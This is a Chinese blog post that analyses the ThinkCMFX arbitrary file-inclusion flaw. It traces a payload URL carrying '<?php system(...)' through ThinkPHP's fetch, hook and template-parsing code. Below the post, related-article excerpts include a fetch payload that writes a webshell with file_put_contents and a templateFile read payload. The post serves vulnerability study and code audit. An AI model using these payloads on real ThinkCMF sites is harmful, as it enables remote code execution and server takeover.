php 任意文件包含漏洞,PHP:ThinkCMFX任意文件包含漏洞

最新推荐文章于 2024-09-13 21:45:01 发布
最新推荐文章于 2024-09-13 21:45:01 发布
阅读量117 收藏
点赞数
文章标签: php 任意文件包含漏洞

前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的

代码下载地址:https://gitee.com/thinkcmf/ThinkCMFX/releases

我们就拿这个payload来进行分析

http://127.0.0.1/index.php?a=fetch&content=<?php system(‘ping xxxxxx’);?>

我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法

我们可以跟进父类的fetch的方法中查看

发现还调用了父类的fetch方法return parent::fetch($templateFile,$content,$prefix);,那我们可以继续来到AppframeController,但是发现里面没有fetch那么就肯定是继承来自Controller的控制器了,继续跟进

发现调用了view类的fetch方法继续更,这里的view类是Controller构造函数中$this->view = Think::instance('Think\View');

view类中的fetch方法如下:

public function fetch($templateFile='',$content='',$prefix='') {

if(empty($content)) { //首先判断content有无内容

$templateFile = $this->parseTemplate($templateFile);

// 模板文件不存在直接返回

if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);

}else{

defined('THEME_PATH') or define('THEME_PATH', $this->getThemePath());

}

// 页面缓存

ob_start();

ob_implicit_flush(0);

if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板

$_content = $content;

// 模板阵列变量分解成为独立变量

extract($this->tVar, EXTR_OVERWRITE);

// 直接载入PHP模板

empty($_content)?include $templateFile:eval('?>'.$_content);

}else{

// 视图解析标签

// 走的是这里

$params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix); // 生成一个数组赋值给$params

Hook::listen('view_parse',$params); //这个是关键

}

// 获取并清空缓存

$content = ob_get_clean();

// 内容过滤标签

Hook::listen('view_filter',$content);

// 输出模板文件

return $content; //这里进行模板文件的输出

}

可以看注释,我们的content肯定是有内容的,那么进行的就是第二个if判断,经过调式走的是第二个判断

来到这里Hook::listen('view_parse',$params); //这个是关键,第一个参数传的是view_parse,我们先看下listen这个函数的说明

/**

* 监听标签的插件

* @param string $tag 标签名称

* @param mixed $params 传入参数

* @return void

*/

static public function listen($tag, &$params=NULL) { // 此时$tag = view_parse

if(isset(self::$tags[$tag])) {

if(APP_DEBUG) {

G($tag.'Start');

trace('[ '.$tag.' ] --START--','','INFO');

}

foreach (self::$tags[$tag] as $name) { //循环遍历

APP_DEBUG && G($name.'_start');

$result = self::exec($name, $tag,$params); // 这里进行执行

if(APP_DEBUG){

G($name.'_end');

trace('Run '.$name.' [ RunTime:'.G($name.'_start',$name.'_end',6).'s ]','','INFO');

}

if(false === $result) {

// 如果返回false 则中断插件执行

return ;

}

}

if(APP_DEBUG) { // 记录行为的执行日志

trace('[ '.$tag.' ] --END-- [ RunTime:'.G($tag.'Start',$tag.'End',6).'s ]','','INFO');

}

}

return;

}

我们全局搜索,view_parse或者echo $name输出调试发现调用的类为ParseTemplateBehavior

'view_parse' => array(

'Behavior\ParseTemplateBehavior', // 模板解析 支持PHP、内置模板引擎和第三方模板引擎

),

在exe函数中 如果类名存在的话会进行实例化 并且调用$tag = view_parse,调用view_parse方法

if('Behavior' == substr($name,-8) ){

// 行为扩展必须用run入口方法

$class = $name;

$tag = 'run'; //此时的$tag = run 所以下方调用的是run方法

}else{

$class = "plugins\\{$name}\\{$name}Plugin";

}

if(class_exists($class)){ //ThinkCMF NOTE 插件或者行为存在时才执行

$addon = new $class();

return $addon->$tag($params); //相当于 return $addon->run($params);

}

我们再看下ParseTemplateBehavior的类中的run方法

// 行为扩展的执行入口必须是run

public function run(&$_data){

$engine = strtolower(C('TMPL_ENGINE_TYPE'));

$_content = empty($_data['content'])?$_data['file']:$_data['content'];

$_data['prefix'] = !empty($_data['prefix'])?$_data['prefix']:C('TMPL_CACHE_PREFIX');

if('think'==$engine){ // 采用Think模板引擎

if((!empty($_data['content']) && $this->checkContentCache($_data['content'],$_data['prefix']))

|| $this->checkCache($_data['file'],$_data['prefix'])) { // 缓存有效

//载入模版缓存文件

Storage::load(C('CACHE_PATH').$_data['prefix'].md5($_content).C('TMPL_CACHFILE_SUFFIX'),$_data['var']);

//C('CACHE_PATH').$_data['prefix'].md5($_content).C('TMPL_CACHFILE_SUFFIX'),$_data['var']地址为

//D:\QMDownload\PHPTutorial\www\thinkcmfx2\data\runtime\Cache\Portal

}else{

$tpl = Think::instance('Think\\Template'); //走的是这里

// 编译并加载模板文件

$tpl->fetch($_content,$_data['var'],$_data['prefix']);

}

}else{

// 调用第三方模板引擎解析和输出

if(strpos($engine,'\\')){

$class = $engine;

}else{

$class = 'Think\\Template\\Driver\\'.ucwords($engine);

}

if(class_exists($class)) {

$tpl = new $class;

$tpl->fetch($_content,$_data['var']);

}else { // 类没有定义

E(L('_NOT_SUPPORT_').': ' . $class);

}

}

}

load方法为关键,这里我们进入看下storage类中的load方法,但是发现不存在,但是有个魔术方法存在__callstatic,它的解释为当创建一个静态方法以调用该类中不存在的一个方法时使用此函数。与__call()方法相同,接受方法名和数组作为参数

转自freebuf的流程图如下:

参考文章:https://www.freebuf.com/vuls/218105.html

weixin_39552768
关注
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1693
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞(学习)
weixin_39967120的博客
12-22 324
前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法我们可以跟进父类的fetch的方法中查看发现还调用了父类的...
PHP文件包含漏洞
m0_51426816的博客
02-08 425
一.常见文件包含函数: include()、require()、include_once()、require_once() 函数中包含的新文件会作为PHP代码执行 1.include():找不到包含的文件会产生警告,脚本继续执行 2.require():找不到包含的文件会产生错误并停止脚本,直接退出 3.include_once()、require_once():和include()、require()的区别是不会重复包含文件 二.文件包含漏洞类型: 1.本地文件包含 (1)目录遍历:通过…/…/读取任意
ThinkCMF框架任意内容包含漏洞的讲解
最新发布
无问社区的博客
09-13 1200
本文来自无问社区,更多网安资料可前往查看ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。0x01 影响版本。
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1350
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
代码审计:任意文件包含php4.81版本)
qq_52986156的博客
10-18 1039
根据以上分析利用url的二次加密可以修改到传参的文件路径以二次加加密编码的‘?此处追溯新参数$target_blacklist)黑名单文件为import.php/export.php。本次采用的是关键字定位,使用工具为seay源代码审计系统。作用url解码,后续的效果同上一条匹配白名单。此条切割英文字符传参截取中文部分匹配白名单。mb_strpos()函数匹配截取的长度。mb_substr()函数切割中文作用。在黑名单匹配不到target的传参值。传参可以匹配到定义的白名单。定位原则:有变量参数传入。
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 400
?>’)/shell.php?>’)
ThinkCMF框架任意文件包含 漏洞复现
偷一个月亮
03-16 1084
0x01 简介 ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 但是由于代码漏洞,可以构造恶意url造成文件包含/上传漏洞。 0x02 漏洞版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkC...
ThinkCMFX文件包含漏洞
冠霖L的博客
11-03 1981
0x00 漏洞简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,从而能够达到远程代码执行 0x01 影响范围 1.6.0 < ThinkCMFX < 2.3.0 0x02 环境搭建 使用ThinkCMFX2.2.0版本搭建,利用中间件phpstudy运行搭建的网站,网站一键安装即可 ...
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1324
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
ThinkCMF 框架上的任意内容包含漏洞
Sylon的博客
10-25 4581
0x01 背景 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又...
php任意文件包含审计,【PHP代码审计】XSS后台敏感操作、文件包含漏洞审计、任意文件读取...
weixin_39921087的博客
03-24 111
XSS 看源码只有SQL的过滤没有XSS的过滤 所以我们可以插入任意XSS代码,找出login_ip字段看允许我们输入多少个字符,还需要知道管理员可以做些什么,我们的XSS攻击需要以管理员身份去执行。 字段长度限制为255个字符,所以我们可以在登陆时构造payload,一般都是执行远程js文件,让他可以执行更多的操作。 准备好攻击payload: 找到管理员可以执行的操作 构造payloa...
ThinkCMF上传漏洞
X__WY__X的博客
09-14 879
ThinkCMF上传漏洞 一.漏洞描述 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 二.漏洞原理 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 三.环境搭建 下载ThinkCMF X2.2.0 链接:https:
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 876
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
ThinkCMF框架修复漏洞 名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617)
M翠峰如簇的专栏
12-01 450
漏洞名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617) 漏洞造成的影响 由于ThinkPHP5框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell入侵服务器。 ThinkCMF框架用ThinkPHP5.011内核修复方法如下: /simplewind/thinkphp/library/think/App.php 类的module方法的获取控制器的代码后面加上 if (!preg_match('/^[A-Za-z](\w.
ThinkCMF v5.0.190111 后台代码执行漏洞复现
weixin_59086772的博客
12-15 3069
近期雨笋教育小编要经常来和大家分享渗透技术干货了,感兴趣的可以多多关注我们。 0x00前言 thinkcmf5.0.19 这个版本后台提供路由自定义, 其中路由的别名对单引号缺少过滤, 导致引发漏洞。 0x01环境搭建 官方github下载地址: https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip 将网站源码解压至phpstudy WEB目录下: C:\phpStudy\PHPTutorial 配置phpstudy实
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2090
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 915
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
深入理解PHP文件包含漏洞:原理、利用与防御
本地文件包含漏洞允许攻击者通过操纵变量来包含服务器上的任意文件,而远程文件包含漏洞则允许攻击者通过变量包含网络上的任何可访问文件,这通常导致更严重的安全风险,因为攻击者可以执行远程服务器上的恶意代码。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值